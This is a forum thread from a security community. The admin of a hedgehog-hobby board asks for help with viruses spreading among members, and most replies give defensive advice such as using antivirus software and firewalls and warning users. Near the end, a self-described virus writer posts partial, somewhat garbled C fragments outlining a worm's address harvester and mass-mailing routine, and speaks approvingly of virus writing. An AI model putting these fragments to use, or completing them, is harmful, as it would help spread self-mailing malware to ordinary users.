No... I'm thinking "the internet" and coincidence....
3700 users and a few get a virus?... Far from fantasy?
I'm concerned about the one via MSN messenger.
This second one came over msn from a Chad Cortese who is TucknRoll on here. Chad hasn't got hedgies, I have his, so he doesn't come on anymore, but I wonder if it is a coincidence that it came from another CnQ member. Ok, I'm getting paranoid.
lol
Maybe they should have a forum for IT security :p
Tindala :
I believe that TS has a point, and that others here have already said that securing the system will prevent a lot of this rubbish.......
You can copy this for starters.
Check out some site tutorials on firewalls and anti-virus set-ups [Freeware a lot of them]
Sygate FireWall - free
Grisoft AVG anti-virus - free
together they should give your membership [those that bother :)] SOME protection.
[edit]
from the front page 'Quick Tips'
Couldn't resist. Quote:
Do not open e-mail attachments from strangers, regardless of how enticing the Subject Line or attachment may be.
Spooky :eek:
luck to you.
Thanks...;-) I'll work on this when I get to Phoenix later tonight!!
I really appreciate the "pats on the head" and knowing that (the virus stuff) can be controlled. I'll massage your referenced material to work for my members.
Coincidence? It's the same people getting viruses, only getting them after having words with one certain person, and it's happened to them several times. This never happened until this certain person began posting on the CNQ board, got mad and started to threaten people. This sounds like a targeted attack to me. This has happened to me on another MB and I KNOW it was an attack. How did it stop? Several weeks after I left the board for good and stopped posting, the viruses stopped. Granted, our members should not be opening attachments without making sure of them first, but then we are not computer experts either and never expected an attack such as this on a simple friendly board. Since the people here are supposed to be computer experts, or at least more advanced in security than the normal layman, I came here for help.
I know that anyone caught writing viruses and infecting the internet can be prosecuted. This has happened to someone I know. He received probation and is banned from the internet. I know this because I was in court when the sentence was handed down. I drove the guy there!
Thank you to all of those who have tried to help instead of offering criticism.
So get the members to follow SIMPLE security tips, and get your board BACK ...........
Quote:
but then we are not computer experts either and never expected an attack such as this on a simple friendly board
YOU drove him there ........... If he was such a l337 guy, why not pick his brains for advice, in conjunction with what you are getting here?
Quote:
I know that anyone caught writing viruses and infecting the internet can be prosecuted. This has happened to someone I know. He received probation and is banned from the internet. I know this because I was in court when the sentence was handed down. I drove the guy there!
As for prosecution ............. depends where you live.
As you say, YOU are not IT whizz kids, and not everyone HERE is either, but we tend to take security a little [a LOT] more seriously than most.
Nowadays, if you DON'T take security seriously, you run the risk of running your PC's for someone else.
Spread the word.
[edit]
when you DO start spreading the word ....................
Start with THEM :D
Quote:
It's the same people getting viruses,
It's hard to "pick his brains" when he is dead. He died in an automobile accident. If not, then I would have gone to him and not bothered anyone on any boards asking for help.
I didn't single anyone out in the post that you are referring to; I don't know why you would single me out by taking my words and quoting them out of context.
Simple security tips ARE being carried out. Quotation in a previous post on this same page states that three viruses were caught. The ones that got through on this particular attack came from MSN messenger.
Criticism and sarcasm are of no help and frankly I am surprised that you would resort to that.
To re-pay a courtesy. Quote:
Criticism and sarcasm are of no help and frankly I am surprised that you would resort to that.
Jett.
You have to remember this is an international board. Some of us should have gone to bed hours ago. What you read as sarcasm may just be the fact it's bloody late where the poster is. They may also have had a drink or two.
:D
Hi All
I am one of the ones that has gotten two viruses. The first one that gave me Miteleader (sp?) I am positive was the troll as I had words with him a few days before. This was weeks ago and I haven't said a word to him or haven't knowingly replied to any of his posts since.
The second one that came over msn yesterday I am beginning to think is just a coincidence.
The person it came from is also a member of the board but he has not been on it in months and has not been on since the troll started. I can't really see that the troll would have chosen an inactive member as his means of sending the virus.
Also I only have msn and the troll seems to talk to people on yahoo. Everyone that I personally have heard that he has threatened or talked to outside of the forum has been on yahoo.
This virus I got yesterday apparently sends itself without needing an attachment opened. The guy I got it from wasn't even home at the time it sent it to everyone on his msn list.
The Bropia worm. Or a variant of it. Details at: http://securityresponse.symantec.com...32.bropia.html
Quote:
This virus I got yesterday apparently sends itself without needing an attachment opened. The guy I got it from wasn't even home at the time it sent it to everyone on his msn list.
What my virus program is telling me I have is
thehedgieden@hotmail [1]. com->(morphine)
cmdrun.exe ->(Morphine)
The first one is just my own hotmail address with [1] and ->(morphine) added to it
I am totally illiterate when it comes to this stuff.
Just wondering - wtf would you guys be fighting about on a board about hedgehogs??
Quote:
Just wondering - wtf would you guys be fighting about on a board about hedgehogs??
hahahahha
Good point Jareds411!!
:thumbsup:
MLF
I think you have this little **** until he/she gets bored with you.
Your best bet now is to make your genuine users less of a target so that he will move on.
He is probably using a proxy, so you won't be able to tell where he is coming from, and therefore you will not be able to block him by IP without cutting off a large proportion of your user base.
The first thing you can do is get the message out that there is a threat on the board.
If the users are aware there is a threat then they can start to take action.
Give out the steps they should take. Give out the links to the free antivirus and firewall. Tell them to go away and get their machines patched up.
The viruses this ***** is sending out are not unknown and they will be picked up by UP TO DATE antivirus. Give them the name of the virus and a link to Norton.com so they can look up the removal instructions and download the tools if need be.
I know your users are not experts (far from it probably) but they are going to have to learn now.
Being ignorant of what is going is not going to stop the viruses.
You possibly have several issues going on, with this guy sending out viruses to average users, probably with out-of-date or no AV, and these guys becoming infected and spreading the bug around to other users.
Can the registration of the board be changed to restrict registration email addresses to ISP emails only? No hotmail/yahoo etc.? This maybe isn't possible, I don't know your system.
Can you assign extra mods to shut this guy down quicker?
What about putting out a message to report incidents involving this to a specific email address, probably a hotmail account for that one so the **** doesn't have a good target?
Are there a lot of postings regarding this *****? Is it possible to try to calm this down a bit? The more posting about it the more attention this guy gets and the more likely he is to hang around.
Unless you can get your users to take some actions to help themselves, they are just going to continue to get shafted.
Greetings,
A small word of advice: this is a huge forum, and your thread's picking up in popularity, 50 replies or so, w00t lol
Don't let yourself get confused by all the suggestions. As admin/mod, you have to lay down basic security measures even though your forum doesn't deal with computers or security. Why? Because now you have someone who DOES know a little bit about computers, and to beat him you have to understand where he's coming from. Just stick to the basics:
1. Post stickies everywhere: it might make a few people panicky, but trust me, security by obscurity isn't the best way to go about a situation like this. You want your members to be on their toes, not caught unawares.
2. Make everyone download the latest AVs and their definitions. I don't care if they're saying they already have; if they had, they wouldn't be in this mess. The problem you're having is NOT a virus writer by any means.
3. Do the same with firewalls. ZoneAlarm (www.zonelabs.com) or Sygate (www.sygate.com) are good places to start.
4. Off the top of my head, also make everyone check for trojans. Get TDS3 (http://tds.diamondcs.com.au/index.php?page=download), make everyone run scans and then see if you turn up anything.
5. Don't panic. You're starting to sound really worried, which is fair considering what you've been going through, but keeping a cool head goes a long way.
Above all, remember: we can only give advice to you. We're all basically shooting in the dark; you give us symptoms, we can give you probable causes. There are a lot of members here who've already started helping you who're very good at that, but in the end you're going to have to make this work.
Cheers
As a first :
Please post back that you ARE implementing SOME of the measures suggested .........
Until you show that you ARE heeding advice FREELY given, then it is highly likely that it is all you will be receiving from now on in.
Quote:
Criticism and sarcasm are of no help and frankly I am surprised that you would resort to that.
Although I cannot see how you call 'it' criticism / sarcasm ............. I call it assistance :p
So, I say again :
Spread the word; and you WILL be surprised just how much of this sh1te can be stopped.
[edit]
also from a quote in this thread ?
It WAS late when I posted [UK] and YES I :drink:
I also study till 03:00 most days, and am up to start work at 06:00.
So if you think I was out of order, go see the padre for a TS slip .........
as stated, this is a HUGE forum, and you are getting a lot of advice / suggestions for free, from people all over the world, and [surprisingly] they are fairly consistent in their prognosis ........................
SECURE YOUR SYSTEMS :)
[edit 2]
No Tiger~, it's not your slip
TS = tuff ****
I'm in PHX at the moment, and on a free terminal until I can check into my hotel room and use my machine.
I will be updating the "Welcome" letter, sending a letter to all registered users, and posting on the "News & Information" area about everyone updating their Virus & Firewall protection.
I will also discuss with the owner of the forum changing some of the User Requirements, e.g.: no @yahoo/gmail/hotmail accounts. That may not fly, as I even use 3 gmails (my primary is Starband).
Lastly, I think I will consider offering Mod status to a couple of my more reliable members. This has grown beyond what 3 people can manage.
Sigh,
Sandra (who wants to be home to deal with this, not at a hotel)
When you consider offering Mod status to your "more reliable" members, also consider their computer skills, not just their Hedgehog skills (what the heck is a hedgehog anyway? I think we call them gophers in the frozen north :D ). Having someone as a Mod who also has some strong computer/network/Internet skills will go a long way in keeping your board safe.
Quote:
Originally posted here by Tindala
I'm in PHX at the moment, and on a free terminal until I can check into my hotel room and use my machine.
I will be updating the "Welcome" letter, sending a letter to all registered users, and posting on the "News & Information" area about everyone updating their Virus & Firewall protection.
I will also discuss with the owner of the forum changing some of the User Requirements, e.g.: no @yahoo/gmail/hotmail accounts. That may not fly, as I even use 3 gmails (my primary is Starband).
Lastly, I think I will consider offering Mod status to a couple of my more reliable members. This has grown beyond what 3 people can manage.
Sigh,
Sandra (who wants to be home to deal with this, not at a hotel)
Keep in touch Sandra, people here can and will help you.
Cheers:
PS: I hate hotels too..... :rolleyes:
For DjM's edification:
A hedgehog is a cute spiny little creature that's a chunk larger than a rat but with a much cuter face.
Bear with me tiger, I am posting from my pub, with a few pints down the hatch and using my blackberry (this keyboard is hard enough without the beers).
Quote:
Originally posted here by Tiger Shark
For DjM's edification:
A hedgehog is a cute spiny little creature that's a chunk larger than a rat but with a much cuter face.
Anyways, what you described still sounds like a gopher, only with gel in its fur/hair
Can you eat them?
Yes, smother them with clay and dump them in a fire to bake. After a suitable cook time remove from the fire. Break open the clay ball. The spines should stay attached to the clay, leaving you with some cooked meat. By the way, there was, a few years back, a hedgehog flavoured crisp on the market over here. Not real, just a gimmick.
Quote:
Can you eat them?
You've got to let them stop SQUEALING first :D
Quote:
After a suitable cook time
Hi DjM,
A hedgehog is one of those little creatures that rolls up into a ball to baffle his enemies... a spiny ball kinda like velcro but with pins instead of velcro hooks... :eek:
Hi jinxy,
First you have to slice open the soft underbelly and remove the guts or the meat will get infected and taste nasty... other than that.... Yummmmmmm! Anybody got a toothpick! :D Do they have recipes on their website too?
Hi foxyloxley,
Geeeeezzzz!...that sounds soooooo cruel to cook it while it's still alive....you have to beat it unconscious first with a rock to tenderize it...then cook it ! Sheeeeeesh ! :D
Eg
I'm an older virus writer, and some of my viruses don't run actually, but I don't understand the malicious virus writers who send a virus only to molest or to appear in the papers.
Basically this area is "vudu" for all coders, and I find it interesting and exciting! Actually I write some dangerous virus codes; the difference is I study that, I'm not interested in being famous.
Now, some virus propagation causes millions in losses for some enterprises, is that true? Or is it a legend only.
Many AV enterprises take a virus as a good business, it is true: they send a hive (virus egg) and infect millions of PCs around the world, two days later they release a removal tool :(), when an independent virus coder sends a hive, then he is persecuted, ironic? yes.
Now with respect to the original post, and Tindala's post, the problem resides in the kernel; the traditional AV doesn't detect this virus, why, simple: the code "delta" is on the ZERO ring kernel level and the AV doesn't see that.
Some viruses implement their own protocols, like a TCP, like an SMTP and others.
Diagnostic:
Loss of memory (and virtual memory)
Low processing task
Malfunction in some kernel objects (frozen system and panic [under linuz])
Rare and unlisted port traffic (open ports etc.)
An "idiot" or "suck.." bad-intentioned message on the screen (no system form objects)
Loss of information (encrypted data and corrupt files)
Denied root access or administrator (windows)
Denied user access
Solution:
in the pack of processes:
- First: a traffic scanner
- Second: a memory scanner (background process and high objects registration) like a spy
- Third: a commercial AV
then, an expert coder who uses these tools and hunts the non-commercial virus.
Yes, this is only an idea, very difficult, but this works only if you don't decide to reinstall or recompile the binaries for the kernel system. Or reinstall the system (data server, web server etc.)
What is it?
A difficult way, but the secure way to take off a rare non-commercial virus.
Regards
firewalls and a/vs usually work, but if they come out with new ones every day, how do we stop them? Do we merely learn from them? And send their attacks back at them? Merely for defensive purposes of course. Or do we let them keep attacking poor innocent people? =(
Now, I couldn't be arsed reading the entire 7 pages (sorry, I'm wasted...) of this thread, but I was just wondering why you think he's writing them? Could he not just be using a virus creation kit? AVs will pick these up.
What does the "virus" do?
lalalala
i2c
Yes, good question, I write a Creation Kit for polymorphic variants, assembler, c++ etc, but the problem with that is:
Quote:
Originally posted here by i2c
Now, I couldn't be arsed reading the entire 7 pages (sorry, I'm wasted...) of this thread, but I was just wondering why you think he's writing them? Could he not just be using a virus creation kit? AVs will pick these up.
What does the "virus" do?
i2c
a virus writer is a lone person, an underground person, actually I don't. I consider myself a newbie in virus writing. I learn day by day. But my point in this ask (my ask) is to take a lot of my experience in virus creation, virus design, to help. I don't say why I decided to take this way, to help persons? Anyway, in the past, now I learn to take life's "happiness". Suicidal boy? Maybe, but I learned from "coding virus" that malicious code is the wrong way; only I have the necessary weapons to live the obfuscated coding in peace and better.
You see, writing a virus code is not a difficult task; you only need to know how the operating system works.
we have a piece of code:
a simple scanner
/\
< >
\/
Code:
char file_parser(const char *filename)
{
    HANDLE __file__; //operator HANDLE( ) const throw( ) rEturns the value of the stored handle (ALT)
    DWORD __offset__, __heap__, __finder__; //operator DWORD( ) const rEturns the cookie associated with the CComGITPtr object (ALT)
    char buf[65535]; // for take a lot of memoRy
    __file__ = CreateFile(filename, FILE_SHARE_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,
                          NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); // rEturns a handle that can be used to access the object
    if (__file__ == NULL || __file__ == INVALID_HANDLE_VALUE) return 1; // i donT need explaiN thiS
    //Like a linuz hd0 equal \\.\PHYSICALDRIVE0
    __heap__ = 0;
    __finder__ = 0;
    for (;;) { // wE dont't need run
        __offset__ = 0; // how we move how we ask onto buFFer
        ReadFile(__file__, buf, sizeof(buf)-2, &__offset__, NULL); // WhY -2 for the first (no last) unsigned int
        if (__offset__ == 0 || __offset__ >= sizeof(buf)) break;
        __heap__ += __offset__;
        buf[__offset__] = 0;
        scantext_textcvt(buf, __offset__); //search for "any" stuff do you WaNT
        __finder__ += scantext_extract_ats(buf, __offset__);
        if ((__finder__ == 0) && (__heap__ > (300*1024))) // really i want a any patrol, no a specific patrol, you see
            //if you take a moment for see .EXE and .dll (object) code you learn by the time why is a reall patrol in
            //some windows or linuz objects
            break;
    }
    CloseHandle(__file__); // close the "stream"
    return 0;
}
If you want send that for mail packets is very simple:
the difficult way:
// queueing for mail transfer packets
static DWORD _stdcall __doomkicker(LPVOID _flag)
{
    struct _MAILPROTOCOL_CLS *_MTQ = (struct _MAILPROTOCOL_CLS *)_flag;
    InterlockedIncrement(&mythread); // increments the value of the specified variable
    if (_MTQ != NULL) {
        _MTQ->_state = 1;
        mmsender(_MTQ);
        _MTQ->_state = 2;
    }
    if (mythread > 0)
        InterlockedDecrement(&mythread); //mythread is the idle for asyncronous sender
    ExitThread(0); // <:)
    return 0; // zero determine the way for the thread heap
}
the _MAILPROTOCOL_CLS if you preffer..a simple dynamic list
#pragma pack(push, 1)
struct _MAILPROTOCOL_CLS {
    struct _MAILPROTOCOL_CLS *next;
    unsigned long tick_got;
    char _state;
    char priority;
    char to[1];
};
#pragma pack(pop) // restore default packing (missing in the original)
the easy way:
prototypes
#define BUFFER_DEFAULT_SIZE 4096
#define TIME_STAMP_YES 0
#define TIME_STAMP_NO 1
#define STR_VALUE 0
#define DW_VALUE 1
#define REG_BUFF 100
structures:
typedef struct
{
    char* ToAdd;
    char* FromAdd;
    char* Subject;
    char* MsgBody;
} SmtpMsg;
typedef struct
{
    char* address;
    int port;
} TCPServer;
static FILE *logFile;
char* getNowTime (void)
{
    struct tm *nowTime;
    time_t aclock;
    time (&aclock);
    nowTime = localtime (&aclock);
    return asctime(nowTime);
}
//principal module (sender)
bool sendData (const char* msg, SOCKET sockInUse, char* rcvBuff)
{
    const char* MSG;
    int ret;
    size_t msgLength;
    ZeroMemory (rcvBuff, BUFFER_DEFAULT_SIZE);
    MSG = msg;
    msgLength = strlen(MSG);
    send (sockInUse, MSG, msgLength, 0);
    ret = recv (sockInUse, rcvBuff, BUFFER_DEFAULT_SIZE, 0);
    if (ret != 0)
        if (ret == SOCKET_ERROR)
            // reached only on SOCKET_ERROR; the original added the error code to the string pointer instead of printing it
            printf("Connection to SMTP server is now OK %d\n", WSAGetLastError());
    return true;
}
ZeroMemory:
The ZeroMemory macro fills a block of memory with zeros.
To avoid undesired effects of optimizing compilers, use the SecureZeroMemory function.
if you don't know what the ZeroMemory prototype is:
void ZeroMemory(
    PVOID Destination,
    SIZE_T Length
);
Parameters
Destination
[in] Pointer to the starting address of the block of memory to fill with zeros.
Length
[in] Size of the block of memory to fill with zeros, in bytes.
Return Values
This function has no return value.
if you have no idea how send is declared:
int PASCAL FAR send (
    IN SOCKET s,
    IN const char FAR * buf,
    IN int len,
    IN int flags);
part of winsock.h
Now, the virus creation needs more coding; this is only the first way or any way, really I'm confused sometimes about what is the better way to attack a virus code (coding). The virus creation tools are the most simple way for kids and children. I take a moment to write an asm virus or C trojan horse, but I repeat:
Is the virus a better way to learn?
I say yes, all viruses involve an "expertise" knowing of how Operating Systems and hardware function..
I don't need morality to see malicious coders like child molesters; those children are the future of the real underground and professional coders. But these children, like me (a long time ago), need someone who teaches the only way: best software, best operating systems (pleasseeee), best games and best persons (machines any..)
Regards i2c and BesT WisheS
AzRaEL [NuKE]
/\
< >
\/
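The ZeroMemory remark quoted in the post above (use SecureZeroMemory to avoid the effects of optimizing compilers) is the one genuinely defensive point in it. As an added example that is not from the thread or its poster, the block below shows the problem and a portable optimizer-resistant wipe built on volatile stores; secure_zero, count_nonzero and the handle_secret_* functions are names introduced here, and "hedgie" is a constructed sample password.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not code from the thread. Portable stand-in for
 * SecureZeroMemory: every store goes through a volatile pointer, so the
 * compiler must emit it and cannot treat the wipe as a removable dead store.
 * Returns the number of bytes cleared. */
size_t secure_zero(void *dst, size_t len)
{
    volatile unsigned char *p = (volatile unsigned char *)dst;
    size_t i;
    for (i = 0; i < len; i++)
        p[i] = 0;                        /* volatile write: never elided */
    return len;
}

/* Verification helper: how many bytes of buf are still non-zero. */
size_t count_nonzero(const void *buf, size_t len)
{
    const unsigned char *b = (const unsigned char *)buf;
    size_t n = 0, i;
    for (i = 0; i < len; i++)
        if (b[i] != 0)
            n++;
    return n;
}

/* Toy "use" of key material (XOR fold) so the buffer is live before the wipe. */
static unsigned char fold_key(const unsigned char *key, size_t len)
{
    unsigned char acc = 0;
    size_t i;
    for (i = 0; i < len; i++)
        acc ^= key[i];
    return acc;
}

/* WEAK: 'key' is never read after the memset, so an optimizing compiler may
 * drop the call entirely and the password stays on the stack for later frames. */
unsigned char handle_secret_weak(const char *password)
{
    unsigned char key[64] = {0};
    unsigned char out;
    strncpy((char *)key, password, sizeof key - 1);
    out = fold_key(key, sizeof key);
    memset(key, 0, sizeof key);          /* may be optimized away */
    return out;
}

/* STRONG: same logic, but the wipe uses volatile stores (the idea behind
 * SecureZeroMemory on Windows and explicit_bzero on BSD/glibc). */
unsigned char handle_secret_strong(const char *password)
{
    unsigned char key[64] = {0};
    unsigned char out;
    strncpy((char *)key, password, sizeof key - 1);
    out = fold_key(key, sizeof key);
    secure_zero(key, sizeof key);        /* always executed */
    return out;
}

int main(void)
{
    unsigned char buf[16];
    memset(buf, 0xAB, sizeof buf);       /* constructed sample "secret" */
    secure_zero(buf, sizeof buf);
    printf("non-zero bytes left after wipe: %zu\n", count_nonzero(buf, sizeof buf));
    printf("weak=%u strong=%u\n", handle_secret_weak("hedgie"), handle_secret_strong("hedgie"));
    return 0;
}
```

Build the weak variant at -O2 and inspect the disassembly to see whether the memset survives; the strong variant keeps its stores regardless of optimization level.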
Yeah, interesting post. I understand the process of creation; anyone that mucks about with code and OSes, I believe, has the knowledge to do some damaging things. I just wanted to learn more about this person's problem as he was very vague on details!
You seem like the majority of us here at AO, interested in "black arts" but with too many morals to use them to cause harm...
Cheers for the post
i2c